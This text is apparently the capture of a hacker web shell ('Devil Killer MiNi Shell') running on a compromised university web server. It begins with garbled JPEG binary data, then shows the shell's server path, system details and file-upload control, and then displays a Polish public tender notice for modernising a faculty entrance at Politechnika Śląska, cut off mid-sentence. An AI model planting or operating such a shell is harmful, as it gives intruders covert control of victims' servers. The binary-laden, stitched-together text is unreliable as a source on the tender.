JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211108/0026150501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja strefy wejściowej Wydziału Górnictwa, Inżynierii Bezpieczeństwa <br/>i Automatyki Przemysłowej. Oznaczenie sprawy: IA1/B/21/79/EO </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Śląska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001637</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Akademicka 2A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gliwice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(32) 237-13-34, 237-13-35</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">IA1@polsl.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.polsl.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja strefy wejściowej Wydziału Górnictwa, Inżynierii Bezpieczeństwa <br/>i Automatyki Przemysłowej. Oznaczenie sprawy: IA1/B/21/79/EO </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0b79fc4c-405e-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00261505</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000229/16/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.79 IA1/B/21/69Modernizacja strefy wejściowej Wydziału Górnictwa, Inżynierii Bezpieczeństwa i Automatyki Przemysłowej /Gliwice, ul. Akademicka 2/</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.administracja.polsl.pl/zamowienia <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://polsl.logintrade.net/rejestracja/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a)<br/>Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy<br/>użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy Przetargowej Politechniki<br/>Śląskiej: https://polsl.logintrade.net/rejestracja/ oraz poczty elektronicznej: IA1@polsl.pl. Korzystanie z<br/>Platformy Przetargowej przez Wykonawcę jest bezpłatne.<br/>b) Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy<br/>pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez<br/>Internet. Wykonawca posiadający konto na Platformie Przetargowej ma dostęp do możliwości złożenia<br/>i wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz<br/>komunikację z Zamawiającym<br/>w pozostałych obszarach.<br/>c) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w zakładce „Instrukcje” na Platformie Przetargowej.<br/>d) Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy Przetargowej wynosi 150<br/>MB.<br/>e) Czas zapisywany jest w formacie YYYY-MM-DD HH:MM:SS. Czas przekazania danych na<br/>Platformę Przetargową jest to czas, w którym zostanie potwierdzone złożenie oferty, zawiadomienia,<br/>dokumentu lub oświadczenia przez Wykonawcę.<br/>f) Wykonawca może również przekazać ww. zawiadomienie, dokument lub oświadczenie (nie dotyczy<br/>oferty) na adres poczty elektronicznej Zamawiającego. Wykonawca, przekazując ww. zawiadomienie,<br/>dokument lub oświadczenie, żąda potwierdzenia dostarczenia wiadomości. Za datę przekazania<br/>zawiadomienia, dokumentu lub oświadczenia przyjmuje się datę otrzymania potwierdzenia<br/>dostarczenia wiadomości zawierającej ww. pliki/ załączniki z serwera pocztowego Zamawiającego. Maksymalny rozmiar plików przesyłanych za pośrednictwem poczty elektronicznej Zamawiającego<br/>wynosi 10 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IA1/B/21/79/EO</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> A. Przedmiotem zamówienia są roboty budowlane obejmujące:<br/>I. Roboty w holu głównym i zapleczu:<br/>1. Roboty rozbiórkowe i demontażowe w zakresie stolarki, ścian, sufitów i posadzek.<br/>2. Wymurowanie nowych ścianek działowych.<br/>3. Wykonanie nowych posadzek.<br/>4. Wykonanie nowych sufitów podwieszanych.<br/>5. Wykonanie okładzin ścian, roboty tynkarskie i malarskie ścian i sufitów.<br/>6. Montaż nowej stolarki i ślusarki wewnętrznej.<br/>7. Dostawa wyposażenia ruchomego i stałego.<br/>8. Roboty w zakresie instalacji sanitarnych: przebudowa instalacji c.o., wod-kan, montaż<br/>instalacji wentylacji wywiewnej.<br/>9. Roboty w zakresie instalacji elektrycznych: demontaż lub przekładka istniejących instalacji,<br/>przebudowa instalacji oświetleniowej i gniazd wtykowych, montaż instalacji oświetlenia<br/>awaryjnego i teleinformatycznej, montaż tablic elektrycznych.<br/>II. Roboty dotyczące elewacji od strony dziedzińca:<br/>1. Demontaż stolarki stolarki okiennej i drzwiowej, obróbek blacharskich, ścianek pod<br/>istniejącymi oknami.<br/>2. Montaż elewacji przeszklonej z izolacją termiczną.<br/>3. Montaż obróbek blacharskich.<br/>4. Dostawa i montaż konstrukcji stalowej wiaty wraz z zadaszeniem ze szkła.<br/>5. Malowanie balustrady balkonu.<br/>III. Roboty dotyczące dziedzińca wewnętrznego:<br/>1. Częściowa rozbiórka istniejącej nawierzchni betonowej.<br/>2. Wykonanie nowych nawierzchni.<br/>3. Wykonanie budowli oporowej jako sali wykładowej na wolnym powietrzu.<br/>4. Przesadzenie istniejących krzewów i drzew, wykonanie nowych nasadzeń zieleni.<br/>5. Dostawa i montaż konstrukcji stalowej pergoli.<br/>6. Dostawa i montaż elementów małej architektury.<br/>7. Dostawa i montaż wyposażenia ruchomego i stałego.<br/>8. Przebudowa kanalizacji deszczowej.<br/>9. Montaż instalacji oświetlenia zewnętrznego.<br/>B. Termin wykonania zamówienia: do 35 tygodni od dnia zawarcia umowy. Uwaga. W pkt<br/>4.2.10.) niniejszego ogłoszenia z powodu braku innych możliwości technicznych, Zamawiający<br/>dokonał przeliczenia terminu wyrażonego w tygodniach (35) na dni (245). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">245 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Informacja o przewidywanych zamówieniach, o których mowa w przepisie art. 214 ust. 1<br/>pkt 7 ustawy.<br/>W okresie 3 lat od dnia udzielenia niniejszego zamówienia podstawowego, Zamawiający przewiduje<br/>możliwość udzielenia Wykonawcy robót budowlanych, zamówień polegających na powtórzeniu<br/>podobnych robót budowlanych do tych ujętych w zamówieniu podstawowym i zgodnych z jego<br/>przedmiotem, w sytuacji gdy wystąpi potrzeba ich wykonania, a Zamawiający będzie dysponował<br/>odpowiednimi środkami finansowymi. Zamówienia w łącznej wysokości maksymalnie do 30% wartości szacunkowej zamówienia podstawowego będą każdorazowo udzielane w trybie z wolnej ręki, na<br/>warunkach ustalanych indywidualnie dla każdego zamówienia w zaproszeniu do negocjacji. Udzielanie<br/>zamówień następować będzie z uwzględnieniem poniższych zasad i czynników cenotwórczych:<br/>a) wielkości nakładów rzeczowych, tj. robocizny, materiałów i pracy sprzętu, wynikać będą z<br/>załączonego do zaproszenia do negocjacji przedmiaru robót,<br/>b) wskaźniki cenotwórcze, ceny materiałów i najmu sprzętu nie będą mogły być wyższe niż te<br/>występujące w kosztorysie ofertowym dotyczącym zamówienia podstawowego,<br/>c) ceny materiałów i najmu sprzętu niewystępujące w kosztorysie ofertowym dotyczącym zamówienia<br/>podstawowego, nie będą mogły przekraczać poziomu średniego cen według cenników Sekocenbudu<br/>za kwartał poprzedzający wystosowanie zaproszenia do negocjacji lub faktur/ ofert handlowych<br/>dotyczących sprzedaży materiałów i wykonania usług niewystępujących w ww. cenniku Sekocenbudu,<br/>d) w przypadku zamówienia udzielanego w terminie co najmniej 12 miesięcy od dnia udzielenia<br/>zamówienia podstawowego, dopuszcza się akceptację wyższych wskaźników cenotwórczych, cen<br/>materiałów i najmu sprzętu w stosunku do tych występujących w kosztorysie ofertowym zamówienia<br/>podstawowego, pod warunkiem udowodnienia przez Wykonawcę zmiany cen materiałów lub kosztów<br/>związanych z realizacją zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. ZDOLNOŚĆ TECHNICZNA<br/>Wykonanie przez Wykonawcę (zakończenie) nie wcześniej niż w okresie ostatnich 5 lat przed<br/>upływem terminu składania ofert, co najmniej:<br/>1. dwóch zamówień, z czego każde o wartości min. 1.000.000,00 zł brutto obejmujące remont lub przebudowę obiektu wraz z instalacjami elektrycznymi i sanitarnymi,<br/>2. jednego zamówienia o wartości min. 100.000,00 zł brutto, polegającego na przebudowie<br/>elewacji z zastosowaniem ślusarki aluminiowej,<br/>3. jednego zamówienia o wartości min. 400.000,00 zł obejmującego zagospodarowanie terenu,<br/>w tym: wykonanie nawierzchni z kostki brukowej, kanalizacji deszczowej, instalacji oświetlenia<br/>zewnętrznego i urządzenie zieleni.<br/>Uwaga: Jeśli zamówienie o charakterze opisanym w punkcie 1 zawiera roboty opisane w<br/>zamówieniu o charakterze opisanym w punkcie 2 lub 2 i 3, to Zamawiający nie wymaga<br/>dodatkowego wykazania wykonania zamówienia opisanego w punkcie 2 lub 2 i 3.<br/>1.2. ZDOLNOŚĆ ZAWODOWA<br/>Dysponowanie przez Wykonawcę osobami (minimum 1 osobą z każdej branży) posiadającymi:<br/>a) uprawnienia budowlane do kierowania robotami w specjalności:<br/>- konstrukcyjno-budowlanej lub architektonicznej,<br/>- inżynieryjnej:<br/>• drogowej,<br/>- instalacyjnej w zakresie:<br/>• sieci wodociągowych i kanalizacyjnych,<br/>• instalacji cieplnych / wentylacyjnych / wodociągowych i kanalizacyjnych,<br/>- instalacyjnej w zakresie:<br/>• instalacji elektrycznych i elektroenergetycznych<br/>i wpisanymi do właściwej Izby Inżynierów Budownictwa (Izby Architektów – w przypadku<br/>uprawnień architektonicznych) – jeżeli odrębne przepisy nakładają obowiązek takiego wpisu;<br/>b) kwalifikacje do wykonywania prac w zakresie urządzeń i instalacji na stanowiskach<br/>eksploatacji (E): urządzenia i instalacje elektryczne o napięciu do 1 kV,<br/>potwierdzone przez uprawnioną instytucję;<br/>c) kwalifikacje do wykonywania prac w zakresie urządzeń i instalacji na stanowiskach dozoru<br/>(D): urządzenia i instalacje elektryczne o napięciu do 1 kV,<br/>potwierdzone przez uprawnioną instytucję;<br/>d) aktualny certyfikat (dyplom, ukończone szkolenie) uprawniający do wykonywania okablowania<br/>sieci strukturalnych, wydany przez producenta oferowanego okablowania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu,<br/>Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia odpisu lub<br/>informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące<br/>przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. Zgodnie z art.<br/>127 ust. 2 ustawy Wykonawca nie jest zobowiązany do złożenia podmiotowych środków<br/>dowodowych,które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich<br/>prawidłowość i aktualność. Zgodnie z art. 274 ust. 4 ustawy Zamawiający nie wzywa do złożenia<br/>podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17<br/>lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile<br/>Wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1, dane umożliwiające dostęp do tych środków.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunku dotyczącego<br/>ZDOLNOŚCI TECHNICZNEJ, o której mowa powyżej w pkt 5.4.) niniejszego ogłoszenia, Zamawiający<br/>wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia WYKAZU ROBÓT<br/>BUDOWLANYCH wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem DOWODÓW określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. W<br/>celu potwierdzenia spełniania przez Wykonawcę warunku dotyczącego ZDOLNOŚCI ZAWODOWEJ, o<br/>której mowa powyżej w pkt 5.4.) niniejszego ogłoszenia, Zamawiający wezwie Wykonawcę, którego<br/>oferta została najwyżej oceniona do złożenia WYKAZU OSÓB, skierowanych przez Wykonawcę do<br/>realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2<br/>i 3 oraz ust. 2 ustawy.<br/>2. Wysokość wadium: 45.000,00 zł. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Do oferty należy dołączyć stosowne pełnomocnictwo do reprezentowania ww. wykonawców,<br/>które powinno być przez nich udzielone (podpisane). Jeżeli została wybrana oferta wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, Zamawiający żąda przed zawarciem umowy<br/>w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>Wykonawcy składający ofertę wspólną ponoszą solidarną odpowiedzialność za wykonanie<br/>umowy i wniesienie zabezpieczenia należytego wykonania<br/>umowy. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W takim przypadku wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w art. 117 ust. 4<br/>ustawy, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>wykonawcy. Każdy z wykonawców występujących wspólnie musi z osobna 